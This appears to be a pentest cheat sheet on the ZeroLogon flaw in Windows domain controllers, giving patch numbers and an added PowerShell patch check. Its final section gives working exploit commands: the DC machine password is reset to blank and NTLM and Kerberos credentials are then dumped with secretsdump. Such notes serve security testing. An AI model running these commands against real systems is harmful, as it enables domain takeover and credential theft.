AD ZeroLogon
Windows CVE-2020-1472
Patches (11 Aug 2020)
- Windows Server 2012 R2 : KB4571723 / Monthly rollup (KB4571703)
- Windows Server 2016 : KB4571694
- Windows Server 2019 : KB4565349
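A host-side check for the patches above, written in PowerShell as an added example that is not part of the original page: run it locally on the DC to see whether one of the listed KBs is installed and whether Netlogon full enforcement is switched on. It assumes an elevated PowerShell 5.1+ session on a Windows Server 2012 R2 / 2016 / 2019 DC; the `FullSecureChannelProtection` registry value is Microsoft's documented enforcement switch and is not from the original page.

```powershell
# Added example (not from the original page): map the DC's OS release to the
# August 2020 KBs listed above and report patch and enforcement state.
$RequiredKbs = @{
    '2012 R2' = @('KB4571723', 'KB4571703')   # security-only update OR monthly rollup
    '2016'    = @('KB4571694')
    '2019'    = @('KB4565349')
}

function Get-ZerologonPatchStatus {
    $osCaption = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    $release   = $RequiredKbs.Keys |
        Where-Object { $osCaption -like "*Server $_*" } |
        Select-Object -First 1

    if (-not $release) {
        return [pscustomobject]@{
            OS = $osCaption; Patched = $null; KBs = ''; Enforced = $null
            Note = 'OS release not covered by the KB table above'
        }
    }

    # Get-HotFix reads Win32_QuickFixEngineering; any one of the listed KBs counts.
    $installed = (Get-HotFix).HotFixID
    $matched   = @($RequiredKbs[$release] | Where-Object { $installed -contains $_ })

    # FullSecureChannelProtection = 1 puts Netlogon into full enforcement mode
    # (secure RPC required for every secure-channel connection, not only DCs and
    # Windows machine accounts). Assumed documented value, not from the page.
    $netlogonKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
    $value = Get-ItemProperty -Path $netlogonKey -Name FullSecureChannelProtection `
                              -ErrorAction SilentlyContinue
    $enforced = ($null -ne $value) -and ($value.FullSecureChannelProtection -eq 1)

    [pscustomobject]@{
        OS       = $osCaption
        Patched  = ($matched.Count -gt 0)
        KBs      = ($matched -join ', ')
        Enforced = $enforced
        Note     = $(if ($matched.Count -eq 0) {
                        'Listed KB not present; if a later cumulative update replaced it, compare the OS build with the KB article instead'
                     } else { '' })
    }
}

Get-ZerologonPatchStatus | Format-List
```

A missing KB entry is not proof of exposure on its own: later cumulative updates supersede the August release and can remove it from the hotfix list, so confirm against the build number in that case.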
Check
# Clone Git repo
cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .
# Check without exploitation
python3 zerologon.py NETBIOSNAME IP
# Expected result on a vulnerable DC:
python3 zerologon.py DC01 1.2.3.4
Performing authentication attempts...
============================================================================
Success! DC can be fully compromised by a Zerologon attack.
Exploit
Warning
This exploit changes the DC machine account password to a blank one!!
# Clone Git repo
cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .
# Run exploit
python3 zerologon.py DC01 1.2.3.4 -x
# Run secretsdump.py with the empty-password NT hash to extract NTLM and Kerberos credentials from the DC
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN.COM/DC01$@1.2.3.4'